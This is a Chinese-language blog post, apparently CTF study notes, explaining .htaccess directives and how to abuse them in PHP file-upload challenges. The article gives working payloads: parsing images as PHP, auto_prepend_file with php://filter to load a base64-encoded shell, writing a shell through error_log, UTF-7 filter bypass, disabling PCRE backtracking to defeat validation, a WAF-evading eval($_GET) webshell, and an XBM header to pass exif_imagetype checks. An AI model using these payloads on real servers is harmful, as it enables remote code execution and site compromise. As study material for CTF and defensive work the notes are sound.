<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="htaccess文件详解"><meta name="keywords" content=""><meta name="author" content="vague huang"><meta name="copyright" content="vague huang"><title>htaccess文件详解 | Tlife</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '5.2.0'
} </script><meta name="generator" content="Hexo 5.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">2.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%AF%E5%AE%9E%E7%8E%B0%E5%8A%9F%E8%83%BD"><span class="toc-number">3.</span> <span class="toc-text">可实现功能</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%87%E4%BB%A4%E4%BD%9C%E7%94%A8%E8%8C%83%E5%9B%B4"><span class="toc-number">4.</span> <span class="toc-text">指令作用范围</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E4%BB%A3%E7%A0%81%E6%95%B4%E5%90%88"><span class="toc-number">5.</span> <span class="toc-text">一些代码整合</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%A9%E6%9F%90%E4%BA%9B%E6%96%87%E4%BB%B6%E4%BB%A5php%E7%9A%84%E6%96%B9%E5%BC%8F%E8%A7%A3%E6%9E%90"><span class="toc-number">5.1.</span> <span class="toc-text">让某些文件以php的方式解析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9C%A8%E6%89%80%E6%9C%89%E9%A1%B5%E9%9D%A2%E5%8C%85%E5%90%AB-require-%E6%9F%90%E4%B8%AA%E6%96%87%E4%BB%B6"><span class="toc-number">5.2.</span> <span class="toc-text">在所有页面包含(require)某个文件</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF%E6%8B%93%E5%B1%95%EF%BC%9A"><span class="toc-number">5.2.1.</span> <span class="toc-text">思路拓展：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81"><span class="toc-number">5.2.2.</span> <span class="toc-text">代码</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%8A%A5%E9%94%99%E4%BF%A1%E6%81%AF%E5%86%99%E6%96%87%E4%BB%B6"><span class="toc-number">5.3.</span> <span class="toc-text">利用报错信息写文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UTF-7%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87%E5%B0%96%E6%8B%AC%E5%8F%B7-lt-%E8%BF%87%E6%BB%A4"><span class="toc-number">5.4.</span> <span class="toc-text">UTF-7编码绕过尖括号&lt;过滤</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#prce%E7%BB%95%E8%BF%87%E6%AD%A3%E5%88%99%E5%8C%B9%E9%85%8D"><span class="toc-number">5.5.</span> <span class="toc-text">prce绕过正则匹配</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tricks"><span class="toc-number">6.</span> <span class="toc-text">tricks</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">vague huang</div><div class="author-info__description text-center"></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">146</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">18</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Tlife</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">htaccess文件详解</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-06-11</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>感觉以前学的确实是不够精，原来htaccess文件不止是可以将其他文件以php的方式解析</p>
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>htaccess提供了针对目录改变配置的方法</p>
<h2 id="可实现功能"><a href="#可实现功能" class="headerlink" title="可实现功能"></a>可实现功能</h2><p>文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表，以及使用其他文件作为index文件等一些功能</p>
<h2 id="指令作用范围"><a href="#指令作用范围" class="headerlink" title="指令作用范围"></a>指令作用范围</h2><p>.htaccess文件中的配置指令作用于.htaccess文件所在的目录及其所有子目录，但是很重要的、需要注意的是，其上级目录也可能会有.htaccess文件，而指令是按查找顺序依次生效的，所以一个特定目录下的.htaccess文件中的指令可能会覆盖其上级目录中的.htaccess文件中的指令，即子目录中的指令会覆盖父目录或者主配置文件中的指令。</p>
<h2 id="一些代码整合"><a href="#一些代码整合" class="headerlink" title="一些代码整合"></a>一些代码整合</h2><h3 id="让某些文件以php的方式解析"><a href="#让某些文件以php的方式解析" class="headerlink" title="让某些文件以php的方式解析"></a>让某些文件以php的方式解析</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">AddType application&#x2F;x-httpd-php .png</span><br><span class="line">将png解析为php</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;FilesMatch &quot;1&quot;&gt; </span><br><span class="line">SetHandler application&#x2F;x-httpd-php </span><br><span class="line">&lt;&#x2F;FilesMatch&gt;</span><br><span class="line">包含1的文件均解析为php</span><br></pre></td></tr></table></figure>

<h3 id="在所有页面包含-require-某个文件"><a href="#在所有页面包含-require-某个文件" class="headerlink" title="在所有页面包含(require)某个文件"></a>在所有页面包含(require)某个文件</h3><p><strong>auto_prepend_file与auto_append_file使用方法</strong></p>
<p>php.ini中有两项</p>
<p>auto_prepend_file 在页面顶部加载文件</p>
<p>auto_append_file  在页面底部加载文件</p>
<p>使用这种方法可以不需要改动任何页面，当需要修改顶部或底部require文件时，只需要修改auto_prepend_file与auto_append_file的值即可。</p>
<h4 id="思路拓展："><a href="#思路拓展：" class="headerlink" title="思路拓展："></a>思路拓展：</h4><p>我们看一下这个原理，他是文件包含的思想在某个页面加载文件，当我们想到文件包含的时候自然而然地就会想到php伪协议，这就是这个功能的厉害所在<br>如果有一道题目，他过滤了php的所有标签，但是允许你上传htaccess，这个时候的思路就是，将含有马的文件base64加密上传，然后再htaccess添加配置：php伪协议解码打开<br>当然显示的页面本身的代码也要是php语言</p>
<h4 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h4><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php_value auto_prepend_file xxx.php</span><br><span class="line">php_value auto_append_file &quot;php:&#x2F;&#x2F;filter&#x2F;convert.base64-decode&#x2F;resource&#x3D;shell.wuwu&quot;</span><br></pre></td></tr></table></figure>

<p>使作用范围内的php文件在文件头/尾自动include指定文件，支持php伪协议</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php_value include_path &quot;xxx&quot;</span><br></pre></td></tr></table></figure>

<p>如果当前目录无法写文件，也可以改变包含文件的路径，去包含别的路径的文件</p>
<p>用途：文件包含，可以配合AddType</p>
<h3 id="利用报错信息写文件"><a href="#利用报错信息写文件" class="headerlink" title="利用报错信息写文件"></a>利用报错信息写文件</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php_value error_reporting 32767</span><br><span class="line">php_value error_log &#x2F;tmp&#x2F;fl3g.php</span><br></pre></td></tr></table></figure>

<p>开启报错的同时将报错信息写入文件</p>
<p>用途：利用报错写shell</p>
<h3 id="UTF-7编码绕过尖括号-lt-过滤"><a href="#UTF-7编码绕过尖括号-lt-过滤" class="headerlink" title="UTF-7编码绕过尖括号&lt;过滤"></a>UTF-7编码绕过尖括号&lt;过滤</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php_value zend.multibyte 1 # 启用多字节编码的源文件解析</span><br><span class="line">php_value zend.script_encoding &quot;UTF-7&quot;</span><br></pre></td></tr></table></figure>

<p>将代码的解析方式改成UTF-7</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">mb_convert_encoding(&#39;&lt;?php eval($_GET[\&#39;cmd\&#39;]); ?&gt;&#39;,&quot;utf-7&quot;);</span><br></pre></td></tr></table></figure>

<p>payload样例：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">+ADw?php phpinfo()+ADs +AF8AXw-halt+AF8-compiler()+ADs</span><br></pre></td></tr></table></figure>

<h3 id="prce绕过正则匹配"><a href="#prce绕过正则匹配" class="headerlink" title="prce绕过正则匹配"></a>prce绕过正则匹配</h3><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php_value pcre.backtrack_limit 0</span><br><span class="line">php_value pcre.jit 0</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>if(preg_match(&quot;/[^a-z\.]/&quot;, $filename) == 1)</code> 而不是<code>if(preg_match(&quot;/[^a-z\.]/&quot;, $filename) !== 0)</code>，因此可以通过php_value 设置正则回朔次数来使正则匹配的结果返回为false而不是0或1，默认的回朔次数比较大，可以设成0，那么当超过此次数以后将返回false</p>
</blockquote>
<h2 id="tricks"><a href="#tricks" class="headerlink" title="tricks"></a>tricks</h2><p>.htaccess似乎可以像shell那样使用<code>\</code>将两行内容解释为一行</p>
<ul>
<li>绕过脏字符<br>如果.htaccess文件中有不符合语法的内容，访问服务器会直接报500，如果题目中乱写.htaccess文件，我们可以尝试换行注释掉脏字符<br>例如：题目中有<code>file_put_contents($filename, $content . &quot;\nJust one chance&quot;)</code>，我们payload最后可以加上<code>#\</code>，<code>#</code>负责注释，<code>\</code>将注释符和脏字符连成一行，注释掉脏字符，最后的文件为</li>
</ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php_value include_path &quot;&#x2F;tmp&quot;</span><br><span class="line">php_value zend.multibyte 1</span><br><span class="line">php_value zend.script_encoding &quot;UTF-7&quot;</span><br><span class="line"># \</span><br><span class="line">Just one chance</span><br></pre></td></tr></table></figure>

<ul>
<li>绕过WAF<br>如果题目过滤了’file’，可以这么写.htaccess</li>
</ul>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">php_value auto_prepend_fi\</span><br><span class="line">le &quot;.htaccess&quot;</span><br><span class="line">#&lt;?php eval($_GET[a]);?&gt;\</span><br></pre></td></tr></table></figure>

<p><strong>(2)绕过exif_imagetype()上传.htaccess</strong></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#define width 20</span><br><span class="line">#define height 10</span><br></pre></td></tr></table></figure>

<blockquote>
<p>采用xbm格式X Bit Map，绕过exif_imagetype()方法的检测，上传文件来解析。<br>在计算机图形学中，X Window系统使用X BitMap，一种纯文本二进制图像格式，用于存储X GUI中使用的光标和图标位图。<br>XBM数据由一系列包含单色像素数据的静态无符号字符数组组成，当格式被普遍使用时，XBM通常出现在标题.h文件中，每个图像在标题中存储一个数组。<br>也就是用c代码来标识一个xbm文件，前两个#defines指定位图的高度和宽度【以像素为单位，比如以下xbm文件：<br><code>#define test_width 16</code><br><code>#define test_height 7</code></p>
</blockquote>
<p>参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/20175211lyz/p/11741348.html">https://www.cnblogs.com/20175211lyz/p/11741348.html</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">vague huang</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2021/06/11/htaccess文件详解/">http://example.com/2021/06/11/htaccess文件详解/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/06/15/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%B1%BB%E7%9A%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E5%86%8D%E5%AD%A6%E4%B9%A0/"><i class="fa fa-chevron-left">  </i><span>PHP反序列化类的基础知识再学习</span></a></div><div class="next-post pull-right"><a href="/2021/06/08/%E4%B8%8D%E5%8C%85%E5%90%AB%E6%95%B0%E5%AD%97%E5%92%8C%E5%AD%97%E6%AF%8D%E7%9A%84webshell/"><span>不包含数字和字母的webshell</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2021 By vague huang</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body></html>